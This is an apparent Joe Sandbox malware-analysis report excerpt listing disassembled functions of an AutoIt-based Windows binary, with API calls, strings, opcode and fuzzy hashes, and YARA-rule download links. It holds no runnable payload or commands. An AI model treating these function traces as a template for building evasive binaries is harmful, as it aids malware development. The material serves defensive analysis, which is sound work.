FreeLibrary.KERNEL32 ref: 0102D3E5

Strings

X64, xrefs: 0102D2A8
GetSystemWow64DirectoryW, xrefs: 0102D3B9

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 7b522354269ca5a63d731483791225d34f53417002f7ae20156358e422da35ca
Instruction ID: 1ffc2450a42a1539d69a8534b8190725d6ad991385874a46435d03a6708b3255
Opcode Fuzzy Hash: 7b522354269ca5a63d731483791225d34f53417002f7ae20156358e422da35ca
Instruction Fuzzy Hash: 48F02B72906631D7F7B11595CC74AAE7758AF12701F59C58AF5C1FA108DB30CE4887D1

Function 00FDDFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 010232B7

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 2d4ebd38e51277136b4c4dd2ad1ab6edcebcf7030c55232410d91e8128368bfe
Instruction ID: c557b984e7b9a1a4709e5d363269930d59b3b08d4c0283b792c959f9de920737
Opcode Fuzzy Hash: 2d4ebd38e51277136b4c4dd2ad1ab6edcebcf7030c55232410d91e8128368bfe
Instruction Fuzzy Hash: 32C26A75E00215CFCB24EF58C880BADB7B2BF09310F28856AE955AF351D379AD41EB91

Function 00FDEC40 Relevance: 5.7, APIs: 3, Instructions: 1195COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00FDFE66

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: ab67f9daf9be3ae3e306b88fa38cb0eeff9d8b87313a74e5d497a56699961edb
Instruction ID: d5e6a3362f5b23b73a5a8354bc748ae57b73567b7578dc8d59c7ddd7e5764e8b
Opcode Fuzzy Hash: ab67f9daf9be3ae3e306b88fa38cb0eeff9d8b87313a74e5d497a56699961edb
Instruction Fuzzy Hash: EFB28E75A08341CFCB24DF14C480B2AB7E2BF89310F58496EE8869B351D775ED49EB92

Function 00FD3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 010133A2

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FD3A04

Strings

Line: , xrefs: 010133EB

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 5f47c029126f5f922a6d3a5ab90b3e8200662c3368bd73432195051af8197354
Instruction ID: a30fad9011d538f131692e8177828903b99432fb2e9a0dafff3da6383c6931ad
Opcode Fuzzy Hash: 5f47c029126f5f922a6d3a5ab90b3e8200662c3368bd73432195051af8197354
Instruction Fuzzy Hash: 9131E272508304AAD325EB20DC45BEFB7DAAF40720F08452FF6D982285DB789A48D7D3

Function 00FEFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00FF0668

Part of subcall function 00FF32A4: RaiseException.KERNEL32(?,?,?,00FF068A,?,010A1444,?,?,?,?,?,?,00FF068A,00FD1129,01098738,00FD1129), ref: 00FF3304

__CxxThrowException@8.LIBVCRUNTIME ref: 00FF0685

Strings

Unknown exception, xrefs: 00FF0692

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 77ff278bf788128f6e27b766c51b2a75ae87a7fd4674eb2c2eeaa24b2c25ed10
Instruction ID: 6549ce84ff6b2fa1da23615da2e789f0c6d8cd7ba87a70eb96777c81d314ab7b
Opcode Fuzzy Hash: 77ff278bf788128f6e27b766c51b2a75ae87a7fd4674eb2c2eeaa24b2c25ed10
Instruction Fuzzy Hash: 10F02835D0020D738F10BA65DC46D7E7B6C5E00320B504071BA14C55B2EF74EA29F5C0

Function 0102D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0102D220

Strings

X64, xrefs: 0102D2A8
%.3d, xrefs: 0102D22B

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 91d265535195b94fcfe945213ff31ebc3e5145c4d863809d88d0025aaecc6f35
Instruction ID: c2605fdff3a6a12a798048c8cc77502039c16bb4c3b68affc619abf43114d398
Opcode Fuzzy Hash: 91d265535195b94fcfe945213ff31ebc3e5145c4d863809d88d0025aaecc6f35
Instruction Fuzzy Hash: BED01271804129E9DB5096E1CC459BDB37CAB69211F40C452F986D1000D628C90C9B61

Function 00FD10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FD1BF4
Part of subcall function 00FD1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FD1BFC
Part of subcall function 00FD1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FD1C07
Part of subcall function 00FD1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FD1C12
Part of subcall function 00FD1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FD1C1A
Part of subcall function 00FD1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FD1C22

Part of subcall function 00FD1B4A: RegisterWindowMessageW.USER32(00000004,?,00FD12C4), ref: 00FD1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FD136A
OleInitialize.OLE32 ref: 00FD1388
CloseHandle.KERNEL32(00000000,00000000), ref: 010124AB

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: e5531d146ff76993f1c0f34f7f04cb78fb2ff16baa0774cf7179cf54554ee1f4
Instruction ID: 030bfdad99d34ac0324d188fe46c93549dcb644099facb2f25f28600ffb19069
Opcode Fuzzy Hash: e5531d146ff76993f1c0f34f7f04cb78fb2ff16baa0774cf7179cf54554ee1f4
Instruction Fuzzy Hash: A271CBB8901A10CFC3A8EF79E5456953AE5FB49384FD8822AD0DAC7389EB3E4401CF51

Function 0103C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FD3A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0103C259
KillTimer.USER32(?,00000001,?,?), ref: 0103C261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0103C270

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 6fa35b438e31e488897302f9c76f337ef273f772d4735f9533c44bb793ee7145
Instruction ID: 17df6a5d84381300759df0c1825ce53806b1bb59bc506dca8250b14d2ec0f83d
Opcode Fuzzy Hash: 6fa35b438e31e488897302f9c76f337ef273f772d4735f9533c44bb793ee7145
Instruction Fuzzy Hash: 5D31D170900344AFFB728F688985BEBBBECAF43304F04049AD2DEA3242C3785684CB51

Function 010086AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,010085CC,?,01098CC8,0000000C), ref: 01008704
GetLastError.KERNEL32(?,010085CC,?,01098CC8,0000000C), ref: 0100870E
__dosmaperr.LIBCMT ref: 01008739

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 9625e69e5861983343c146a167b76f0e4a3d6853d0f893a4b9dfbe02df0d183d
Instruction ID: 3e572dd623319e50030c0fa135d6f1f4783bc1fad326ff9ccf954bb002b2149a
Opcode Fuzzy Hash: 9625e69e5861983343c146a167b76f0e4a3d6853d0f893a4b9dfbe02df0d183d
Instruction Fuzzy Hash: 45018232E0426016F6B36238AC4477E2FC96B95734F26819BE9C89B0D7DE65C4818750

Function 00FDDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 00FDDB7B
DispatchMessageW.USER32(?), ref: 00FDDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FDDB9F
Sleep.KERNEL32(0000000A), ref: 00FDDBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 01021CC9

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 3e27b709606260f01d10ee9f7559955c666c347ece7055c2053c27c82d8145b3
Instruction ID: 26660888ee7c44c07ec3d8ecb89004a99dd28f66bde5fd616c5078bac8107e52
Opcode Fuzzy Hash: 3e27b709606260f01d10ee9f7559955c666c347ece7055c2053c27c82d8145b3
Instruction Fuzzy Hash: 59F03A316043449AE7308BA0DC49FAA73A9AB84310F50451AE68A831C0DB389088EB15

Function 00FE1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00FE17F6

Strings

CALL, xrefs: 00FE17C6

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 80ef2f8501e88e733637a4630345b9ff640b10feb3cd0ef3fbf0123645f06427
Instruction ID: 21eb903e0b337c4cfcd7d80fa3aa37b832fa298c8769b48ce0f4b0675d37913a
Opcode Fuzzy Hash: 80ef2f8501e88e733637a4630345b9ff640b10feb3cd0ef3fbf0123645f06427
Instruction Fuzzy Hash: ED227D706083819FC714DF16C880B2ABBF1BF85314F18896DF8968B362D776E945DB92

Function 00FE01E0 Relevance: 3.6, APIs: 2, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e98f0fc410d3815799a79f6dc595988f6ef124027007969fc281dd04d2182724
Instruction ID: 8525cd803dbb20b52fd4355a223d5618824d5a7c75be17d75c2ff731ed454eab
Opcode Fuzzy Hash: e98f0fc410d3815799a79f6dc595988f6ef124027007969fc281dd04d2182724
Instruction Fuzzy Hash: F9321F30A00215DFCB20DF65CC84BEEB7B1FF05310F148569EA95AB2A1DB75E984EB91

Function 00FD2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 01012C8C

Part of subcall function 00FD3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD3A97,?,?,00FD2E7F,?,?,?,00000000), ref: 00FD3AC2

Part of subcall function 00FD2DA5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00FD2DC4

Strings

X, xrefs: 01012C5A

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 09c3c4898de44209781de2d079df9bcfd17cf146ff41df96a55a939efef2bbc1
Instruction ID: d88c40635c814e1cb6dde71213d9c3ef727d5bd3fb8b241054bbfeeb2507fd93
Opcode Fuzzy Hash: 09c3c4898de44209781de2d079df9bcfd17cf146ff41df96a55a939efef2bbc1
Instruction Fuzzy Hash: 1A21F371A002489BDF41EF94CC45BEE7BF9AF49304F04805AE544E7345DBB856899BA1

Function 0102D363 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,?), ref: 0102D375

Strings

X64, xrefs: 0102D2A8

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: ComputerName
String ID: X64
API String ID: 3545744682-893830106
Opcode ID: df2728844c86e6a1d37206540f75ff03e885dc61f1f5b2d5f97bccc5cad8db13
Instruction ID: 13195d1756c8667c0e225c1b1757defcda9c20b78a293e898cee749d3a09a92b
Opcode Fuzzy Hash: df2728844c86e6a1d37206540f75ff03e885dc61f1f5b2d5f97bccc5cad8db13
Instruction Fuzzy Hash: AED0C9B5805128EACB90CB80D888DDDB37CBB14311F508152F182A2004D7349A488B10

Function 00FD3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FD3908

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 54248cc9b34aff6db9862839ac3d8565c8af019afe7d85c36db7ccdc526f81ee
Instruction ID: c3d448abb41be867d5d0b24c8ca225ffe8be12ad6ee3bbb6f6bc5c81f8e8629c
Opcode Fuzzy Hash: 54248cc9b34aff6db9862839ac3d8565c8af019afe7d85c36db7ccdc526f81ee
Instruction Fuzzy Hash: 373193729047019FE720DF24D484797BBE8FB49718F04092EF6DA97340E7B6AA44DB52

Function 00FEF645 Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00FEF661

Part of subcall function 00FDD730: GetInputState.USER32 ref: 00FDD807

Sleep.KERNEL32(00000000), ref: 0102F2DE

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: InputSleepStateTimetime
String ID:
API String ID: 4149333218-0
Opcode ID: 219c73ac95eab4fabe23b8fcb9212dff94bc9e4ff9e2e91b8f15601c38e69610
Instruction ID: 05c0550388ccbc17fa6442f7378e6236ab893ddb53948a8c0a879a9aaf6ee367
Opcode Fuzzy Hash: 219c73ac95eab4fabe23b8fcb9212dff94bc9e4ff9e2e91b8f15601c38e69610
Instruction Fuzzy Hash: BAF0A031240206DFD310EF79E949B6AB7E9FF46760F04002AE899CB360DB74A800DB90

Function 00FDB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00FDBB4E

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: b4604ef1582a394bc1ca25cc6d0bf2a50f5129f295975be6ca2abe4625292bbf
Instruction ID: 74f70b8f6bf049271a868a4353392cef63fbf68a4fbe97bab7272c6edcaf19ad
Opcode Fuzzy Hash: b4604ef1582a394bc1ca25cc6d0bf2a50f5129f295975be6ca2abe4625292bbf
Instruction Fuzzy Hash: 0832EC31A00219DFDB20CF58C894BBEB7BAEF44310F19805AF985AB355C778AD41EB91

Function 00FD4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FD4EDD,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4E9C
Part of subcall function 00FD4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FD4EAE
Part of subcall function 00FD4E90: FreeLibrary.KERNEL32(00000000,?,?,00FD4EDD,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4EFD

Part of subcall function 00FD4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,01013CDE,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4E62
Part of subcall function 00FD4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FD4E74
Part of subcall function 00FD4E59: FreeLibrary.KERNEL32(00000000,?,?,01013CDE,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4E87

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: a20515a98b7c1e4946c9404c1175bad113af056837bbfcd19a457f904dd50e99
Instruction ID: 531c4ac09412a6fc11e8cc4abc51feda5b6f890c6eea477f5dfed4a20dac05b3
Opcode Fuzzy Hash: a20515a98b7c1e4946c9404c1175bad113af056837bbfcd19a457f904dd50e99
